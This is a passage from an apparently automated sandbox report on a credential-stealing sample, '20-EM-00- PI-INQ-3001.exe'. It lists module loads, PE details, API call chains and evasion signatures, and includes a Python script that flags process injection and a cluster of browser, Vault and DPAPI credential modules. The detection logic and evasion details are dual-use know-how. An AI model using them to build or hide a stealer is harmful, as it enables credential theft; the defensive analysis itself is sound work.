            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: cryptbase.dll
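The process tree and module loads above carry the detection content of this report. The dropper starts C:\Windows\SysWOW64\svchost.exe with its own path as the command line (an image/command-line mismatch that goes with the thread-injection and foreign-memory-write signatures in the summary); rasdial.exe, a dial-up helper, is started by a process outside the system directories, spawns firefox.exe, and then loads winsqlite3.dll, vaultcli.dll, dpapi.dll and cryptbase.dll, the modules needed to read browser SQLite credential stores and the Windows Vault and to unprotect DPAPI blobs. Note that eVmdoPPWSZoVOB.exe is, per the FakeChrome PDB path recorded further down this report, the sandbox's browser decoy, so on a real host the parent of rasdial.exe would be whichever process the injector chose; the logic below does not depend on its name. The following is an added example, not Joe Sandbox's code, that runs these four checks over constructed Sysmon-style process-creation (ID 1) and image-load (ID 7) events mirroring this report; the PIDs and the event dictionary layout are assumptions.

```python
import ntpath
from collections import defaultdict

# Modules a credential stealer needs (browser SQLite stores, Windows Vault, DPAPI)
# and that a dial-up helper such as rasdial.exe has no legitimate reason to load.
CREDENTIAL_MODULES = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll", "cryptbase.dll"}
MIN_CREDENTIAL_MODULES = 3
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def cmdline_image(cmdline: str) -> str:
    """Image name a command line claims to run: its first token, honouring quotes."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return basename(s[1:end] if end > 0 else s[1:])
    return basename(s.split(" ", 1)[0])


def triage(events):
    """Return {pid: [finding, ...]} over Sysmon-style ProcessCreate (id 1) and ImageLoad (id 7) events.
    Checks: image/command-line mismatch, system binary with non-system parent, system binary
    spawning a browser, and a cluster of credential-access modules loaded by one process."""
    findings = defaultdict(list)
    loaded = defaultdict(set)
    for ev in events:
        if ev["id"] == 1:
            img, parent = ev["image"].lower(), ev["parent_image"].lower()
            claimed = cmdline_image(ev["cmdline"])
            # svchost.exe carrying the dropper's own path: hollowed or otherwise masqueraded process.
            if claimed != basename(img):
                findings[ev["pid"]].append(
                    f"image {basename(img)} but command line names {claimed} (hollowing/masquerade)")
            # A System32/SysWOW64 binary started by something outside those directories.
            # On its own this is only a triage signal; baseline it before alerting.
            if img.startswith(SYSTEM_DIRS) and not parent.startswith(SYSTEM_DIRS):
                findings[ev["pid"]].append(
                    f"{basename(img)} launched by {parent} (system binary, untrusted parent)")
            # A system utility starting a browser, as rasdial.exe does with firefox.exe here.
            if parent.startswith(SYSTEM_DIRS) and basename(img) in BROWSERS:
                findings[ev["parent_pid"]].append(
                    f"{basename(parent)} spawned browser {basename(img)} (injection target)")
        elif ev["id"] == 7:
            loaded[ev["pid"]].add(basename(ev["image_loaded"]))
    for pid, mods in loaded.items():
        hit = sorted(mods & CREDENTIAL_MODULES)
        if len(hit) >= MIN_CREDENTIAL_MODULES:
            findings[pid].append(f"loaded credential-access modules {', '.join(hit)}")
    return dict(findings)


SAMPLE = r"C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"
DECOY = r"C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe"
RASDIAL = r"C:\Windows\SysWOW64\rasdial.exe"

# Constructed events mirroring this report's process tree; PIDs are invented and the
# report lists the first process's parent as unknown.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 100, "parent_pid": 0, "image": SAMPLE, "parent_image": "unknown",
     "cmdline": f'"{SAMPLE}"'},
    {"id": 1, "pid": 101, "parent_pid": 100, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "parent_image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"id": 1, "pid": 106, "parent_pid": 105, "image": RASDIAL, "parent_image": DECOY,
     "cmdline": f'"{RASDIAL}"'},
    {"id": 1, "pid": 107, "parent_pid": 106, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent_image": RASDIAL, "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
]
SAMPLE_EVENTS += [{"id": 7, "pid": 106, "image_loaded": "C:\\Windows\\SysWOW64\\" + m}
                  for m in ("rasapi32.dll", "wininet.dll", "winsqlite3.dll",
                            "vaultcli.dll", "dpapi.dll", "cryptbase.dll")]
SAMPLE_EVENTS += [{"id": 7, "pid": 100, "image_loaded": "C:\\Windows\\SysWOW64\\" + m}
                  for m in ("wsock32.dll", "version.dll")]

if __name__ == "__main__":
    for pid, notes in triage(SAMPLE_EVENTS).items():
        for note in notes:
            print(f"pid {pid}: {note}")
```

Run against these events the script reports two findings for the svchost.exe instance (mismatched command line, untrusted parent) and three for rasdial.exe (untrusted parent, browser child, credential-module cluster); the sample itself and firefox.exe produce none. The module-cluster threshold is the check most worth keeping in production, since winsqlite3.dll plus vaultcli.dll plus dpapi.dll is rarely loaded by anything except browsers, credential managers and stealers.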
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
            Source: C:\Windows\SysWOW64\rasdial.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: 20-EM-00- PI-INQ-3001.exe Static file information: File size 1163264 > 1048576
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eVmdoPPWSZoVOB.exe, 00000005.00000000.1922768601.00000000003FE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1689488135.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1685743507.0000000004150000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1909080883.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1910744947.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2001345010.000000000484E000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1999168737.0000000004699000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000001.00000002.1995959984.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964917968.000000000321A000.00000004.00000020.00020000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000003.1938759402.0000000000F74000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1689488135.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1685743507.0000000004150000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1909080883.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1910744947.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000003.2001345010.000000000484E000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1999168737.0000000004699000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000002.1995959984.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964917968.000000000321A000.00000004.00000020.00020000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000003.1938759402.0000000000F74000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.000000000333C000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3530968033.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.000000000502C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2283662036.000000003813C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.000000000333C000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3530968033.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.000000000502C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2283662036.000000003813C000.00000004.80000000.00040000.00000000.sdmp
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E6C304 LoadLibraryA,GetProcAddress,0_2_00E6C304
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E58719 push FFFFFF8Bh; iretd 0_2_00E5871B
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1E94F push edi; ret 0_2_00E1E951
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1EA68 push esi; ret 0_2_00E1EA6A
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E18B85 push ecx; ret 0_2_00E18B98
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1EC43 push esi; ret 0_2_00E1EC45
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1ED2C push edi; ret 0_2_00E1ED2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414833 push ss; retf 1_2_00414842
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041389F push FFFFFFA4h; ret 1_2_004138AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412100 push edi; iretd 1_2_00412101
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403110 push eax; ret 1_2_00403112
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A987 push ebp; ret 1_2_0040A99B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417CE3 push eax; ret 1_2_00417CE4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413FF7 push ss; retf 1_2_0041403C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417FAD push esp; iretd 1_2_00417FB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380225F pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038027FA pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx1_2_038309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380283D push eax; iretd 1_2_03802858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03801368 push eax; iretd 1_2_03801369
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02ABD6A0 push es; iretd 5_2_02ABD6A5
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB8E92 push FFFFFFA4h; ret 5_2_02AB8EA0
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AAF6F2 push B7D34988h; ret 5_2_02AAF6F7
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB76F3 push edi; iretd 5_2_02AB76F4
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB9E26 push ss; retf 5_2_02AB9E35
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AAFF7A push ebp; ret 5_2_02AAFF8E
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AAF4B6 push ebp; ret 5_2_02AAF46F
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AAF457 push ebp; ret 5_2_02AAF46F
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F94238 push eax; ret 5_2_02F94247
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F86EF5 push ebp; ret 5_2_02F86EFE
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8E663 push edi; iretd 5_2_02F8E664
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8FE02 push FFFFFFA4h; ret 5_2_02F8FE10
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DF4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00DF4A35
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E755FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E755FD
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E133C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E133C7
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe API/Special instruction interceptor: Address: FF3204
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\rasdial.exe Window / User API: threadDelayed 9776
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-99037
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe API coverage: 5.1 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rasdial.exe API coverage: 2.6 %
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe TID: 8188 Thread sleep time: -55000s >= -30000s
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe TID: 8188 Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8176 Thread sleep count: 196 > 30
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8176 Thread sleep time: -392000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8176 Thread sleep count: 9776 > 30
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8176 Thread sleep time: -19552000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E54696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00E54696
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E5C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00E5C9C7
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E5C93C FindFirstFileW,FindClose, 0_2_00E5C93C
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E5F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E5F200
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E5F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E5F35D
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E5F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E5F65E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E53A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E53A2B
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E53D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E53D4E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E5BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E5BF27
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02A1C420 FindFirstFileW,FindNextFileW,FindClose, 6_2_02A1C420
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00DF4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DF4AFE
            Source: firefox.exe, 00000007.00000002.2284878740.000001CD3801C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK,
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531276397.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3530968033.0000000002C19000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe API call chain: ExitProcess graph end node graph_0-97352
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\rasdial.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004174F3 LdrLoadDll, 1_2_004174F3
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E641FD BlockInput, 0_2_00E641FD
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00DF3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00DF3B4C
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E25CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00E25CCC
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E6C304 LoadLibraryA,GetProcAddress, 0_2_00E6C304
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00FF34D0 mov eax, dword ptr fs:[00000030h] 0_2_00FF34D0
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00FF3470 mov eax, dword ptr fs:[00000030h] 0_2_00FF3470
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00FF1E70 mov eax, dword ptr fs:[00000030h] 0_2_00FF1E70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h] 1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385438F mov eax, dword ptr fs:[00000030h] 1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h] 1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h] 1_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h] 1_2_038B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h] 1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h] 1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h] 1_2_038D43D4
